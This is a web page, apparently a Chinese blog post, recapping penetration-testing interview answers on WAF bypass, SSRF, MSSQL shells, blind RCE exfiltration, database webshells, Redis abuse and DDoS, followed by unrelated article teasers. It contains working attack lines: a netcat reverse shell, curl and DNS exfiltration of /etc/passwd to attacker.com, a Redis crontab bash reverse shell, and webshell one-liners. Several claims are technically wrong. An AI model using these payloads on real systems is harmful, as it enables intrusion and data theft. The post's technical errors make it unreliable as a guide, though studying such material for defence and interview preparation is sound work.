当前位置：首页 > news >正文

2025年渗透测试面试题总结-某四字大厂面试复盘扩展二面（题目+回答）

news 来源：原创 2025/8/22 18:40:32

网络安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

某四字大厂面试复盘二面

一、文件上传绕过WAF的15种深度技巧

二、SSRF利用与WAF绕过的8种高阶手法

三、MSSQL无XP_CMDSHELL的6种拿Shell方法

四、无回显RCE的5种数据外带技术

五、数据库写Shell的跨平台方法

六、大型日志分析的7个关键步骤

七、Redis未授权的5大渗透场景

八、SYN FLOOD攻击的防御与检测

九、UDP反射放大的攻防全景

某四字大厂面试复盘扩展二面
文件上传如何绕waf
SSRF的利用和绕waf的手段
谈谈MSSQL如果XPCMDSHELL不能用怎么拿shell
遇到没回显的RCE怎么办
不能用SQLMAP的OS-SHELL，各种数据库如何写SHELL
给你一个比较大的日志，应该如何分析
redis未授权会导致哪些问题
讲讲SYN FLOOD原理，防御，检测手段
讲讲UDP反射放大的原理，防御，检测手段
一、文件上传绕过WAF的15种深度技巧

内容检测绕过
文件头伪造：在恶意文件前添加合法文件头（如GIF89a），绕过魔术数字检测。
多文件合并：将WebShell嵌入图片尾部，利用PHP的include函数包含执行。
分块编码（Transfer-Encoding: chunked）：拆解恶意代码为多个块，绕过正则匹配。

扩展名混淆
大小写变形：上传.PhP或.Jsp%20（空格截断）。
双重扩展名：shell.jpg.php （部分WAF仅检测最后一个扩展名）。
空字节注入：shell.php%00.jpg （PHP 5.3前版本有效）。

MIME类型伪造
修改Content-Type：上传PHP文件时声明为image/jpeg。
多部分表单混淆：在multipart/form-data中插入多个文件段干扰解析。

协议层绕过
HTTP/2流复用：利用多路传输特性绕过内容扫描。
分片传输（Teardrop攻击）：发送重叠的TCP分片导致WAF重组错误。

高级混淆技术
Unicode编码文件名：shell.%u0070hp（部分WAF解码不一致）。
动态参数化：通过JSON/XML传递文件内容，绕过表单字段检测。
HTTPS加密传输：部分WAF无法解密TLS流量进行深度检测。

二、SSRF利用与WAF绕过的8种高阶手法

协议滥用
Gopher协议：构造HTTP请求攻击内网服务（如Redis未授权写SSH密钥）。
Dict协议：探测内网端口开放状态（dict://127.0.0.1:6379/info）。

IP表示形式绕过
十进制IP：2130706433 → 127.0.0.1。
IPv6缩写：[::]等价于127.0.0.1。
域名重解析：利用xip.io （如127.0.0.1.xip.io ）。

DNS重绑定攻击
短TTL域名：配置DNS记录在两次查询中返回不同IP（首次合法，第二次内网IP）。
多级CNAME：通过多次跳转绕过域名黑名单检测。

URL编码与变形
双重编码：%252F → %2F → /。
利用#号：http://attacker.com#@10.0.0.1 （部分解析库忽略#后内容）。

云服务元数据利用
AWS IMDSv1绕过：通过X-Forwarded-For头欺骗元数据服务（已修复，需IMDSv2）。
Kubernetes API：通过/var/run/secrets/kubernetes.io/serviceaccount/token 获取Pod权限。

三、MSSQL无XP_CMDSHELL的6种拿Shell方法
CLR集成利用
编译C#执行命令的DLL，通过CREATE ASSEMBLY加载并调用：
sqlCREATE ASSEMBLY ExecCMD FROM 'C:\temp\cmd.dll'; CREATE PROCEDURE sp_cmd @cmd NVARCHAR(255) AS EXTERNAL NAME ExecCMD.StoredProcedures.CmdExec; EXEC sp_cmd 'whoami'; 
OLE自动化过程
启用Ole Automation Procedures，通过sp_OACreate执行命令：
sqlEXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE; DECLARE @shell INT; EXEC sp_OACreate 'WScript.Shell', @shell OUTPUT; EXEC sp_OAMethod @shell, 'Run', NULL, 'cmd.exe /c whoami'; 
Python/R脚本扩展
启用外部脚本功能，执行Python反弹Shell：
sqlEXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("nc -e /bin/sh 10.0.0.1 4444")'; 
数据库错误信息外带
通过错误回显获取命令结果：
sqlBEGIN TRY DECLARE @var NVARCHAR(100) = (SELECT 'whoami' + 1); END TRY BEGIN CATCH SELECT ERROR_MESSAGE(); -- 返回 'whoami'命令结果 END CATCH 
日志文件写入WebShell
利用MSSQL的xp_dirtree或xp_subdirs写入文件：
sqlEXEC xp_cmdshell 'echo ^<%@ Page Language="C#" %>^<% System.Diagnostics.Process.Start("cmd.exe"); %> > C:\inetpub\wwwroot\shell.aspx'; 
四、无回显RCE的5种数据外带技术
DNS外带
Linux：dig $(whoami).attacker.com
Windows：nslookup %USERNAME%.attacker.com
HTTP请求外带
通过curl/wget发送数据到外部服务器：
bashcurl http://attacker.com/$(cat /etc/passwd | base64) 
时间盲注
利用命令执行延时判断结果：
bashif [ $(whoami) = "root" ]; then sleep 10; fi 
文件写入+读取组合
将结果写入临时文件，再通过其他漏洞读取：
bashwhoami > /tmp/result.txt && python -m SimpleHTTPServer 8000 
ICMP隧道
使用工具如icmpsh将数据封装在ICMP包中传输：
bash./icmpsh_m.py attacker 受害者IP 
五、数据库写Shell的跨平台方法

数据库类型 写Shell命令 利用条件
MySQL SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/shell.php'; 需要FILE权限和secure_file_priv为空
PostgreSQL COPY (SELECT '<?php system($_GET[cmd]);?>') TO '/var/www/shell.php'; 需要超级用户权限
Oracle UTL_FILE.PUT_TEXT('WEB_DIR', 'shell.jsp', '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>'); 需预先配置目录对象
MSSQL EXEC xp_cmdshell 'echo ^<^%^ @Language="JScript" %^>^ <% eval(Request.Item["cmd"]) ^%^> > C:\inetpub\wwwroot\cmd.aspx'; 需启用xp_cmdshell
SQLite 通过ATTACH DATABASE写入Web目录：ATTACH DATABASE '/var/www/shell.php' AS evil; 需Web目录可写

六、大型日志分析的7个关键步骤

高频IP筛选
使用awk '{print $1}' access.log | sort | uniq -c | sort -nr统计可疑IP。

状态码分析
过滤404（扫描器特征）和5xx（潜在攻击成功）。

User-Agent检测
搜索非常规UA（如sqlmap、nmap）。

敏感路径监控
检查/admin、/wp-login.php 等路径的异常访问。

攻击特征匹配
使用正则匹配/etc/passwd、union select等关键字。

会话关联分析
通过sessionid或IP关联多次请求，识别扫描行为。

时间序列异常
分析突发流量（如1分钟内1000次请求）可能为CC攻击。

七、Redis未授权的5大渗透场景
数据泄露
通过keys *遍历所有键，获取敏感信息。

SSH密钥写入
利用config set dir和config set dbfilename覆盖authorized_keys。

主从复制RCE
设置恶意主节点，同步.so模块实现代码执行。
Crontab任务注入
写入定时任务反弹Shell：
bashconfig set dir /var/spool/cron/crontabs/ set -e "\n* * * * * bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\n" 
内网代理
通过Redis的SLAVEOF命令将节点作为流量中转。
八、SYN FLOOD攻击的防御与检测
攻击原理
发送大量伪造源IP的SYN包，耗尽服务器半连接队列。
防御手段
SYN Cookie：无状态处理SYN请求，仅在ACK验证后分配资源。
首包丢弃：随机丢弃部分SYN包，迫使攻击者重传消耗资源。
限速策略：通过iptables限制单个IP的SYN速率：
bashiptables -A INPUT -p tcp --syn -m limit --limit 1/s -j ACCEPT 
检测方法
netstat统计：netstat -n | grep SYN_RECV | wc -l
流量分析：监控SYN包与ACK包的比例异常（正常约为1:1）。
九、UDP反射放大的攻防全景

攻击原理
利用UDP协议无连接特性，伪造受害者IP向开放服务（如NTP、DNS）发送请求，触发远大于请求的数据包（放大倍数可达500倍）。

常见反射源
NTP（Monlist）：monlist请求返回600字节，放大倍数200x。
DNS（ANY查询）：返回包含所有记录的响应包。
Memcached：通过get请求触发大体积数据返回（曾导致1.7Tbps攻击）。

防御策略
关闭无用UDP服务：禁用NTP的monlist功能。
入口过滤（BCP38）：ISP端配置ACL阻止伪造IP流量。
限速与黑洞：在边界路由器对异常流量实施限速或黑洞路由。

检测技术
流量基线对比：识别短时间内UDP流量突增。
源端口分析：反射攻击通常使用固定源端口（如NTP的123端口）。

数据库类型	写Shell命令	利用条件
MySQL	`SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/shell.php';`	需要`FILE`权限和secure_file_priv为空
PostgreSQL	`COPY (SELECT '<?php system($_GET[cmd]);?>') TO '/var/www/shell.php';`	需要超级用户权限
Oracle	`UTL_FILE.PUT_TEXT('WEB_DIR', 'shell.jsp', '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>');`	需预先配置目录对象
MSSQL	`EXEC xp_cmdshell 'echo ^<^%^ @Language="JScript" %^>^ <% eval(Request.Item["cmd"]) ^%^> > C:\inetpub\wwwroot\cmd.aspx';`	需启用xp_cmdshell
SQLite	通过ATTACH DATABASE写入Web目录：`ATTACH DATABASE '/var/www/shell.php' AS evil;`	需Web目录可写

2025年渗透测试面试题总结-某四字大厂面试复盘扩展二面（题目+回答）

网络安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。目录某四字大厂面试复盘二面一、文件上传绕过WAF的15种深度技巧二、SSRF利用与WAF绕过的8种高阶手法 …...

编程日记 2025/8/22 18:40:32

基于BP神经网络的杂草智能识别系统（杂草识别、Python项目）

基于BP神经网络的杂草智能识别系统项目介绍本项目是一个基于PyQt5和BP神经网络的杂草智能识别系统。系统通过图像处理和神经网络技术， 能够识别8种不同的杂草类别。用户可以通过上传图片，系统会自动识别图片中的杂草类别，并显示识别结果和…...

编程日记 2025/8/22 18:34:25

Java的Selenium的特殊元素操作与定位之时间日期控件

分为两种情况: 控件没有限制手动输入，则直接调用sendKeys方法写入时间数据 //时间日期控件处理 chromeDriver.get ("https://www,fliggy,com/?ttidsem.000000736&hlreferidbaidu.082076&route sourceseo"); chromeDriver.findElement (By.xpat…...

编程日记 2025/8/22 18:29:04

深入理解矩阵乘积的导数：以线性回归损失函数为例

深入理解矩阵乘积的导数：以线性回归损失函数为例在机器学习和数据分析领域，矩阵微积分扮演着至关重要的角色。特别是当我们涉及到优化问题，如最小化损失函数时，对矩阵表达式求导变得必不可少。本文将通过一个具体的例子——线性…...

编程日记 2025/8/22 18:30:08

基于大数据的美团外卖数据可视化分析系统

【大数据】基于大数据的美团外卖数据可视化分析系统 （完整系统源码开发笔记详细部署教程）✅ 目录一、项目简介二、项目界面展示三、项目视频展示一、项目简介该系统通过对海量外卖数据的深度挖掘与分析，能够为美团外卖平台提供运营决策支…...

编程日记 2025/8/22 18:32:17

TypeScript 类型系统详解

基础类型 TypeScript 支持丰富的基础数据类型，涵盖number、string、boolean、null、undefined、symbol以及bigint。这些类型为构建可靠的代码提供了基石。数值类型（number）：在 TypeScript 里，所有数字均为浮点数…...

编程日记 2025/8/22 18:29:04

【学Rust写CAD】33 近似 Alpha 混合函数(argb.rs补充方法）

源码 #[inline]pub fn over(self, dst: Argb) -> Argb {let a 256 - self.alpha32();let rb (dst.rb() * a) >> 8;let ag dst.ag() * a;Argb(self.0 (rb & Argb::MASK) | (ag & !Argb::MASK))}源码分析这段代码实现了一个近似 Alpha 混合（“…...

编程日记 2025/8/22 18:22:48

4.3-4.6学习总结 Java：Set系列集合+双列集合+Map

Set系列集合： 元素是唯一的。 HashSet： 哈希值： 如果没有重写hashcode方法和equals方法，那么哈希值是根据地址值计算的。 LinkedHashSet： TreeSet底层为红黑树。红黑树：两个红色节点不能相连。双列集合&…...

编程日记 2025/8/22 18:29:05

深信服护网蓝初面试题

《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token1860256701&langzh_CN 5000篇网安资料库https://mp.weixin.qq.com/s?__bizMzkwNjY1Mzc0Nw&mid2247486065&idx2&snb30ade8200e842743339d428f414475e&chksmc0e4732df793fa3bf39…...

编程日记 2025/8/22 18:29:05

2011-2019年各省地方财政商业服务业等事务支出数据

2011-2019年各省地方财政商业服务业等事务支出数据 1、时间：2007-2019年 2、来源：国家统计局、统计年鉴 3、指标：行政区划代码、地区、年份、地方财政商业服务业等事务支出 4、范围：31省 5、指标说明：地方财政在商…...

编程日记 2025/8/22 18:30:08

InfoSec Prep: OSCP靶场渗透

InfoSec Prep: OSCP InfoSec Prep: OSCP ~ VulnHubInfoSec Prep: OSCP, made by FalconSpy. Download & walkthrough links are available.https://www.vulnhub.com/entry/infosec-prep-oscp,508/ 1，将两台虚拟机网络连接都改为NAT模式 2，攻击机上做…...

编程日记 2025/8/22 18:30:06

【Kubernetes】Kubernetes 如何管理存储？PV 和 PVC 是如何工作的？

在 Kubernetes 中，存储管理是通过 Persistent Volume (PV) 和 Persistent Volume Claim (PVC) 来实现的。它们为容器化应用提供持久化存储，使得应用在重启或重新调度时仍然能够访问数据。 1. 存储管理概述 Kubernetes 的存储管理是基于持久化卷 (Pe…...

编程日记 2025/8/22 18:34:26

CasaOS小主机本地安装1Panel运维面板结合内网穿透移动端远程运维

文章目录前言1. 添加镜像源2. 部署1Panel3. 本地访问测试4. 安装内网穿透工具5. 配置公网地址6. 配置固定公网地址前言小伙伴们，是不是一想到要远程管理服务器就头大如斗？特别是没有公网IP或路由器设置复杂时，简直让人抓狂！但…...

编程日记 2025/8/22 18:24:53

BGP路由协议之属性2

Orgin 起源公认必遵属性起源名称标记描述IGPi如果路由是由始发的 BGP 路由器使用 network 命令注入到 BGP 的，那么该 BGP 路由的 origin 属性为 IGPEGPe如果路由是通过 EGP 学习到的，那么该 BGP 路由的 Origin 属性为 EGPIncomplete?如果路由是通过…...

编程日记 2025/8/19 7:20:44

HttpClient（笔记）

介绍： 发送请求的步骤： 发送get类型的请求： 发送post类型的请求：...

编程日记 2025/8/18 0:23:27

【简历全景认知】简历的历史演变与当代定位：从羊皮卷到算法博弈的艺术

引言：时间维度下的求职凭证。当古埃及工匠在莎草纸上记录自己的技能时，他们不会想到这份"技能清单"会在四千年后演变成LinkedIn上的数字档案。简历作为个人职业身份的载体，其演变史就是一部微观的人力资源配置史。从手写推荐信到ATS系统解析的PDF，每一次形式变…...

编程日记 2025/8/17 23:36:43

ERP系统五大生产模式概述

制造业中，选择合适的生产模式是企业高效运营的关键。以下是ERP系统支持的五大核心生产模式及其特点总结： 1. MTS（按库存生产） - 定义：先生产后销售，基于需求预测提前备货。 - 适用场景：需求稳定、标准化程度高的产品（如日用品、家电）。 - 优点：交货快、生产…...

编程日记 2025/8/17 23:51:47

003 vue生命周期和钩子函数

文章目录 1.Vue实例有一个完整的生命周期，也就是说从开始创建、初始化数据、编译模板、挂载DOM、渲染-更新-渲染、卸载等一系列过程，称之为Vue实例的生命周期 2.钩子函数（监听函数）：Vue实例在完整的生命周期过程中&…...

编程日记 2025/8/17 22:20:11

学透Spring Boot — 016. 魔术师 - Spring MVC Conversion Service 类型转换

本文是我的《学透Spring Boot》专栏的第16篇文章，了解更多请移步我的专栏： Postnull的专栏《学透Spring Boot》目录遇到问题日期格式的转换实现需求创建转换器注册转换器编写Controller 访问测试存在的问题解决问题源码分析总结 …...

编程日记 2025/8/20 2:26:55

Ubuntu 22 Linux上部署DeepSeek R1保姆式操作详解（Xinference方式）

一、安装步骤 1.基础环境安装安装显卡驱动、cuda，根据自己硬件情况查找相应编号，本篇不介绍这部分内容，只给出参考指令，详情请读者自行查阅互联网其它参考资料。 sudo apt install nvidia-utils-565-server sudo apt install…...

编程日记 2025/8/21 18:52:03

C语言查漏补缺:占位符篇

占位符篇 1. 整数类型2. 字符类型3. 浮点数类型4. 指针类型5. 字符串6. 修饰符 1. 整数类型 %d / %i：用于 int（有符号十进制整数）。int num -42; printf("%d", num); // 输出: -42%u：用于 unsigned int（无…...

编程日记 2025/8/17 22:20:03

springcloud现常用的组件都有哪些，如何使用

Spring Cloud是一个用于构建分布式系统的开源框架，它提供了多个常用的组件来简化分布式系统的开发和部署。以下是Spring Cloud中常用的一些组件： Spring Cloud Config：用于集中式管理配置，并提供配置的动态刷新功能。Spring Clou…...

编程日记 2025/8/20 10:22:48

Vue3响应式引擎解密：从依赖追踪到性能调优的深度之旅

一、响应式内核架构演进 1.1 响应式范式升级 1.2 新旧架构性能对比操作类型Vue2(ms)Vue3(ms)提升幅度深对象初始化8502203.86x数组操作响应120186.67x嵌套属性访问340655.23x批量更新响应210326.56x 二、依赖追踪机制剖析 2.1 依赖收集实战案例 // 数据模型const state r…...

编程日记 2025/8/21 5:27:06

主流程发起，去除子流程的时长计算问题

问题： 有三个流程，流程1.2.3，流程2.3是流程1的子流程，若在流程1的过程中发起流程2.3，计算流程1的时长要排除流程2.3的时间，流程2.3之间可能是包含、交集、无交集三种。实现代码： import jav…...

编程日记 2025/8/20 2:26:58

Java 8 到 Java 21 系列之新日期时间API：精确的时间管理（Java 8）

Java 8 到 Java 21 系列之新日期时间API：精确的时间管理（Java 8） 系列目录 Java8 到 Java21 系列之 Lambda 表达式：函数式编程的开端（Java 8）Java 8 到 Java 21 系列之 Stream API：数据处理的…...

编程日记 2025/8/22 16:54:31

【LeetCode】在每个树行中找最大值（DFS 深度优先搜索）

📌题目链接：LeetCode 515. 在每个树行中找最大值题目描述给定一棵二叉树的根节点 root，请找出该二叉树中每一层的最大值。示例示例 1 输入: root [1,3,2,5,3,null,9] 输出: [1,3,9]示例 2 输入: root [1,2,3] 输出: [1,3]思路分析 …...

编程日记 2025/8/17 1:58:11

深度学习中模型量化那些事

在深度学习中模型量化可以分为3块知识点，数据类型、常规模型量化与大模型量化。本文主要是对这3块知识点进行浅要的介绍。其中数据类型是模型量化的基本点。常规模型量化是指对普通小模型的量化实现，通常止步于int8的量化，绝大部分推理引擎都…...

编程日记 2025/8/22 15:24:03

手写JSX实现虚拟DOM

🤍 前端开发工程师、技术日更博主、已过CET6 🍨 阿珊和她的猫_CSDN博客专家、23年度博客之星前端领域TOP1 🕠 牛客高级专题作者、打造专栏《前端面试必备》、《2024面试高频手撕题》、《前端求职突破计划》 🍚 蓝桥云课签约作者、…...

编程日记 2025/8/17 23:54:15

Redis的Spring客户端的使用

Redis 的 Spring 客户端使用前面使用 Jedis 时, 是借助 Jedis 对象中的各种方法来对 Redis 进行操作. 而在 Spring 框架中, 则是通过 StringRedisTemplate 来操作 Redis. 最开始提供的类是 RedisTemplate, StringRedisTemplate 是 RedisTemplate 的子类, 专门用于处理文本数据…...

编程日记 2025/8/19 4:49:48

7.4 SVD 的几何背景

一、SVD 的几何解释 SVD 将矩阵分解成三个矩阵的乘积： ( 正交矩阵 ) ( 对角矩阵 ) ( 正交矩阵 ) (\pmb{正交矩阵})\times(\pmb{对角矩阵})(\pmb{正交矩阵}) (正交矩阵)(对角矩阵)(正交矩阵)，用几何语言表述其几何背景： ( 旋转 ) ( 伸缩 )…...

编程日记 2025/8/20 23:39:55

WEB安全--内网渗透--LMNTLM基础

一、前言 LM Hash和NTLM Hash是Windows系统中的两种加密算法，不过LM Hash加密算法存在缺陷，在Windows Vista 和 Windows Server 2008开始，默认情况下只存储NTLM Hash，LM Hash将不再存在。所以我们会着重分析NTLM Hash。在我们内…...

编程日记 2025/8/20 22:11:41

BN 层做预测的时候, 方差均值怎么算

✅ 一、Batch Normalization（BN）回顾 BN 层在训练和推理阶段的行为是不一样的，核心区别就在于： 训练时用 mini-batch 里的均值方差，预测时用全局的“滑动平均”均值方差。 🧪 二、训练阶段（Trai…...

编程日记 2025/8/18 0:23:24

【AI热点】meta新发布llama4深度洞察（快速认知）

以下是一份针对新发布的 Llama 4 模型的深度洞察报告。报告将从模型家族整体概览、技术创新与架构特点、功能与性能表现、多模态与超长上下文、与主流竞品比较、应用场景与未来展望六大部分进行分析和总结。一、Llama 4 家族整体概览家族成员 Llama 4 Scout 总参数量约 10…...

编程日记 2025/8/19 4:22:56

大厂机考——各算法与数据结构详解

目录及其索引哈希双指针滑动窗口子串普通数组矩阵链表二叉树图论回溯二分查找栈堆贪心算法动态规划多维动态规划学科领域与联系总结哈希学科领域：计算机科学、密码学、数据结构定义：通过哈希函数将任意长度的输入映射为固定长度…...

编程日记 2025/8/22 14:04:41

前端面试的ACM模式笔试输入模式

在前端面试的ACM模式笔试中，输入参数的读取是核心技能之一，以下是常见场景的代码实现及注意事项： 一、JavaScript的两种输入模式 1. V8模式（浏览器环境/部分OJ平台） • 核心方法：通过 read_line() 或 rea…...

编程日记 2025/8/20 5:14:46

AIP-215 API特定proto

编号215原文链接AIP-215: API-specific protos状态批准创建日期2018-10-01更新日期2018-10-01 API通常使用API特定proto定义，偶尔依赖通用组件。保持API相互隔离可以避免版本问题和客户端库打包问题。指南所有特定于某个API的protos 必须位于带有主版本号的包…...

编程日记 2025/8/21 14:48:43

计算机毕业设计指南

哈喽各位大四的小伙伴们，以下是一份详细的计算机专业毕业设计指南，涵盖选题、流程、技术选型、开发建议和常见问题解决方案，帮助你高效完成毕业设计，如有其他问题，欢迎点击文章末尾名片进行咨询，可免费赠送…...

编程日记 2025/8/21 9:53:08

内网渗透-Linux提权之suid提权

Linux提权之suid提权 suid简介在Linux系统中的文件，通常有rwx也就是读、写、执行三种权限，但其实还有第四种权限，也就是suid权限。在执行拥有suid权限的文件的过程中，会获得文件属主的权限。例如，当cat命令具有suid…...

编程日记 2025/8/18 0:52:01

FreeCAD傻瓜教程-钣金工作台SheetMetal的安装和简单使用

起因： 因为需要在平面上固定一段比较短的铝型材，角码太占用横向空间，所以想做两个Z字固定片，将型材从两端进行螺丝固定。在绘图的时候想到，板材折弯后的长度。开孔位置等都会有所变化，如何确定相关的尺寸&a…...

编程日记 2025/8/17 22:20:06

语法: ptr=malloc(size)

MALLOC( ) 语法: ptrmalloc(size) 参数: size是一个整数,表示被分配的字节个数; 返回值: 如果允许的话,返回值是一个指向被分配存储器的指针;否则的话, 返回值是一个非指针; 功能: 该函数用来分配一定大小的空间给一个对象,其大小为size,但该空间的值为不确定值; 有…...

编程日记 2025/8/17 22:20:14

（五）安卓开发中的滚动布局（ScrollView / HorizontalScrollView）使用详解

在安卓开发中，滚动布局是一种非常重要的布局方式，它允许用户在屏幕上滚动查看超出屏幕范围的内容。本文将详细讲解滚动布局的基本概念、主要属性、代码示例以及具体的使用场景，帮助开发者深入理解并灵活运用。基本概念滚动布局本质上是一个…...

编程日记 2025/8/21 5:41:26

Matlab:三维绘图

目录 1.三维曲线绘图命令：plot3 实例——绘制空间直线实例——绘制三角曲线 2.三维曲线绘图命令：explot3 3.三维网格命令：mesh 实例——绘制网格面实例——绘制山峰曲面实例——绘制函数曲线 1.三维曲线绘图命令：plot3 …...

编程日记 2025/8/22 7:08:45

Java中String、Array、List的相互转换工具类

Java中的数组与集合类的使用，系列文章：《Java数组》《Java集合类》《Java中String、Array、List的相互转换工具类》《Java8使用Stream流实现List列表的查询、统计、排序、分组》《Java实现List集合的排序：Comparable接口、Comparator接口、stream().sorted()方法的使用…...

编程日记 2025/8/19 17:41:45

【HFP】蓝牙HFP应用层核心技术研究

免提配置文件（Hands-Free Profile, HFP）作为实现设备间音频通信的关键协议，广泛应用于车载系统、蓝牙耳机等场景。本文将基于最新技术规范，深入剖析HFP应用层的功能要求、协议映射及编解码器支持，为蓝牙开发工程师提供详尽的技术指南。一、HFP应用层功能全景图 HFP定义…...

编程日记 2025/8/19 8:06:53

P1734 最大约数和(dp)

题目描述选取和不超过 S 的若干个不同的正整数，使得所有数的约数（不含它本身）之和最大。输入格式输入一个正整数 S。输出格式输出最大的约数之和。输入输出样例输入 #1复制 11 输出 #1复制 9 说明/提示【样例说明】取数…...

编程日记 2025/8/20 17:13:08

P1596 [USACO10OCT] Lake Counting S（DFS）

题意翻译由于近期的降雨，雨水汇集在农民约翰的田地不同的地方。我们用一个 NM(1≤N≤100,1≤M≤100) 的网格图表示。每个网格中有水（W） 或是旱地（.）。一个网格与其周围的八个网格相连，而一组相连的网格视…...

编程日记 2025/8/20 8:03:59

ROS Bag 数据裁剪教程

ROS Bag 数据裁剪教程文章目录 ROS Bag 数据裁剪教程1. Bag 数据显示2. Bag 数据裁剪2.1 基本命令2.2 过滤更多条件2.3 注意事项在使用 ROS 进行机器人开发和调试时，我们经常需要使用 rosbag 工具来记录和回放传感器数据、日志等信息。本文将介绍如何使用 rosba…...

编程日记 2025/8/20 11:40:13

AF3 OpenFoldDataLoader类解读

AlphaFold3 data_modules 模块的 OpenFoldDataLoader 类继承自 PyTorch 的 torch.utils.data.DataLoader。该类主要对原始 DataLoader 做了批数据增强与控制循环迭代次数（recycling）相关的处理。源代码： class OpenFoldDataLoader(torch.utils.data.DataLoader):def __in…...

编程日记 2025/8/20 20:18:42